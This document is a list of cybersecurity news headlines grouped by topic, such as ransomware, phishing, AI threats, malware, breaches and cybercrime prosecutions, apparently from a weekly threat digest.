CISOs in 2025: Balancing security, compliance, and accountability - Help Net Security

Steps Organisations Can Take to Improve Cyber Resilience - Security Boulevard

Cyber security jobs are paying better than ever right now — but there are still some major issues | TechRadar

It’s a Hard Time to Be a CISO. Transformational Leadership Is More Imp - Infosecurity Magazine

How cyber security failures are draining business budgets - Help Net Security

The ROI of Security Investments: How Cyber Security Leaders Prove It

Where should the buck stop? Risks to CISOs in today’s regulatory environment | Constangy, Brooks, Smith & Prophete, LLP - JDSupra

Maximizing cyber security ROI: Best practices for CISOs today | TechRadar

Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers

Why Future-proofing Cyber Security Regulatory Frameworks Is Essential

Ambitious cyber security regulations leave companies in compliance chaos - Help Net Security

Threats

Ransomware, Extortion and Destructive Attacks

Scattered Spider, BlackCat criminals claw back • The Register

Critical Veeam RCE bug now used in Frag ransomware attacks

Tackling ransomware without banning ransom payments | TechRadar

The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard

To Pay or Not to Pay: The Ransomware Dilemma - Security Boulevard

OpenText reveals 2024 nastiest malware, LockBit leads list

WHO, 50 countries warn United Nations of increasing ransomware attacks against hospitals - The Hindu

Remarks at a UN Security Council Briefing on Ransomware Attacks against Hospitals and Other Healthcare Facilities and Services – DataBreaches.Net

Cyber attacks on healthcare: A global threat that can’t be ignored | The United Nations Office at Geneva

New Ymir ransomware partners with RustyStealer in attacks

5 BCDR Oversights That Leave You Exposed to Ransomware

Cloud Ransomware Flexes Fresh Scripts Against Web Apps

Busting Ransomware’s Billion-Dollar Boom with Network Observability and Security - Security Boulevard

New ShrinkLocker ransomware decryptor recovers BitLocker password

Idaho Man Turns to RaaS to Extort Orthodontist

Ransomware Victims

Ransomware attack on Bucharest: data of hundreds of thousands of citizens involved – DataBreaches.Net

Cyber Attack Cost Oil Giant Halliburton $35 Million - SecurityWeek

Embargo ransomware claims breach of US pharmacy network • The Register

Phishing & Email Based Attacks

Phishing attacks surge in 2024 as cyber criminals adopt AI tools and multi-channel tactics | TechRadar

Thousands of employees could be falling victim to obvious phishing scams every month | TechRadar

Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium

Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica

New Wave Of Phishing Attacks Exploits Microsoft Visio Files For Two-Step Credential Theft

Most prolific phishing campaign of 2024 | Professional Security Magazine

This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar

This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar

Microsoft Exchange adds warning to emails abusing spoofing flaw

If You Fall for a Phishing Email, Here’s What Happens Next

I Almost Fell For a Phishing Scam: Here’s What Happened

Other Social Engineering

Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium

Winter Fuel Payment Scam Targets UK Citizens Via SMS | Tripwire

Scammers target UK senior citizens with Winter Fuel Payment texts

Pensioners Warned Over Winter Fuel Payment Scam Texts - Infosecurity Magazine

Malware being delivered by mail, warns Swiss cyber agency

North America sees social engineering scams multiply by a factor of 10

The terrifying Google Maps tactic now used by email scammers | Tech News | Metro News

Artificial Intelligence

AI-Based Attacks Top Gartner’s List of Emerging Threats – Again   | MSSP Alert

Execs identify AI-driven cyber attacks as top security threat | SC Media

Employees are hiding their AI use from their managers. Here's why | ZDNET

HackerOne: 48% of Security Professionals Believe AI Is Risky

Hackers Are Using AI Against You: Here Is How To Protect Yourself

3 key generative AI data privacy and security concerns | TechTarget

80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis

Risk of AI in CIISec survey | Professional Security Magazine

AI Threat to Escalate in 2025, Google Cloud Warns - Infosecurity Magazine

Inside The Duality of AI's Superpowers

Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online

How CISOs Can Lead the Responsible AI Charge

Organisations face mounting pressure to accelerate AI plans, despite lack of ROI | ZDNET

Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes

Artificial intelligence and cyber crime: implications for individuals and the healthcare sector – DataBreaches.Net

How to ward-off fraudulent job seekers propped up by AI   | SC Media

Sticker shock: Are enterprises growing disillusioned with AI? | ZDNET

Malware

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

ESET shines light on cyber criminal RedLine empire | Computer Weekly

Cyber Criminals Use Excel Exploit to Spread Fileless Remcos RAT Malware

Hackers now use ZIP file concatenation to evade detection

Hackers Abusing Google Ads To Deliver Fakebat Malware

Google Chrome extensions remain a security risk as Manifest V3 fails to prevent data theft and malware exploitation | TechRadar

Sophisticated Infostealers Top Malware Rankings

Hive0145 Targets Europe with Advanced Strela Stealer Campaigns - Infosecurity Magazine

New Glove Stealer malware bypasses Chrome's cookie encryption

This devious new malware is going after macOS users with a whole barrel of tricks | TechRadar

Hello again, FakeBat: popular loader returns after months-long hiatus | Malwarebytes

OpenText reveals 2024 nastiest malware, LockBit leads list

Watch out, that Excel document could be infected with dangerous malware | TechRadar

‘Top 10’ malware strain, Remcos RAT, now exploiting Microsoft Excel files | SC Media

Volt Typhoon rebuilds malware botnet following FBI disruption

North Korean hackers create Flutter apps to bypass macOS security

Malware being delivered by mail, warns Swiss cyber agency

This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar

MacBook Pro Owners Warned As 99 New Security Problems Reported

New Ymir ransomware partners with RustyStealer in attacks

TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine

Bots/Botnets

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

Volt Typhoon rebuilds malware botnet following FBI disruption

Mobile

Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium

To patch a dangerous flaw, Pixel users need to install the November security update ASAP - PhoneArena

iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state

Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices

6 telltale signs that your Android phone has malware

US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek

NatWest blocks bevy of messenger apps on staff devices • The Register

Google Confirms $1 Trillion AI Security Protection For Pixel Users

This Pixel phone feature listens in on calls to protect you from scams | ZDNET

Denial of Service/DoS/DDoS

Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post

DDoS Attacks Targeting ISPs are Different – Here’s How - Security Boulevard

'Cyber attack' council in Tewkesbury working to ease backlog - BBC News

What will carpet bomb attacks mean for security teams in 2025? - Tech Monitor

Internet of Things – IoT

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

Burglars are jamming Wi-Fi security cameras. Here's what you can do | PCWorld

Unpatched Vulnerabilities Allow Hacking of Mazda Cars: ZDI - SecurityWeek

Data Breaches/Leaks

Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald's, HSBC, HP, and Potentially 1000+ Other Companies | InfoStealers

Here's what we know about the Snowflake data theft suspects • The Register

Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine

Major cyber attacks and data breaches of 2024 - Security Boulevard

Debt Relief Firm Forth Discloses Data Breach Impacting 1.5 Million People - SecurityWeek

200,000 SelectBlinds customers have their cards skimmed in malware attack

Not to alarm you, but your Social Security number is already leaked | The Independent

300,000 Patients Impacted By Law Firm Data Breach

Business records on 100M+ people swiped, put up for sale • The Register

Leaked info of 122 million linked to B2B data aggregator breach

Another major US healthcare organisation has been hacked, with potentially major consequences | TechRadar

Embargo ransomware claims breach of US pharmacy network • The Register

Misconfigured Microsoft Power Pages could lead to data breaches

IT specialist Jack Teixeira jailed for 15 years after leaking classified military documents on Discord

HIBP notifies 57 million people of Hot Topic data breach

Organised Crime & Criminal Actors

Scattered Spider, BlackCat criminals claw back • The Register

US Prison Sentences for Nigerian Cyber Criminals Surge in Recent Months - SecurityWeek

How Global Threat Actors May Respond to a Second Trump Term

Here's what we know about the Snowflake data theft suspects • The Register

ESET shines light on cyber criminal RedLine empire | Computer Weekly

Crypto CEO safe after being kidnapped and held for $1 million ransom  | Fortune Crypto

Charges Unsealed for Alleged Hackers of Snowflake Customers

World Economic Forum calls for joint efforts to counter cyber threats - World - DAWN.COM

WEF Launches New Framework to Combat Cyber Crime - Infosecurity Magazine

Cyber crook devoid of boundaries gets 10-year prison stint • The Register

Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin

What To Know About Cyber Criminal Ross Ulbricht And His Possible Release Under Trump

The spatiotemporal patterns and driving factors of cyber crime in the UK during the COVID-19 pandemic | Humanities and Social Sciences Communications

The UK will work with international partners to dismantle the cyber criminal ecosystem: UK statement at the UN Security Council - GOV.UK

FBI Warns US Organisations of Fake Emergency Data Requests Made by Cyber Criminals - SecurityWeek

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering

Criminal crypto launderer gets 12.5 years in prison • The Register

Crypto CEO safe after being kidnapped and held for $1 million ransom | Fortune Crypto

Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin

Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes

Insider Risk and Insider Threats

IT specialist Jack Teixeira jailed for 15 years after leaking classified military documents on Discord

Guardsman gets 15 years after leaking secret info on Discord • The Register

Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert

Insurance

Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers

Supply Chain and Third Parties

BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy

NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net

Millions of records from MOVEit hack released on dark web | SC Media

Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine

Single points of failure breed systemic risk to national security | SC Media

300,000 Patients Impacted By Law Firm Data Breach

Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine

Cloud/SaaS

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

5 Ways to Save Your Organisation From Cloud Security Threats

Strategies for CISOs navigating hybrid and multi-cloud security - Help Net Security

Outages

Single points of failure breed systemic risk to national security | SC Media

Microsoft investigates OneDrive issue causing macOS app freezes

Identity and Access Management

Identity Security Is The Cornerstone Of Modern Cyber Defence

Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks"

Embracing The Future Of Cryptography And Identity Management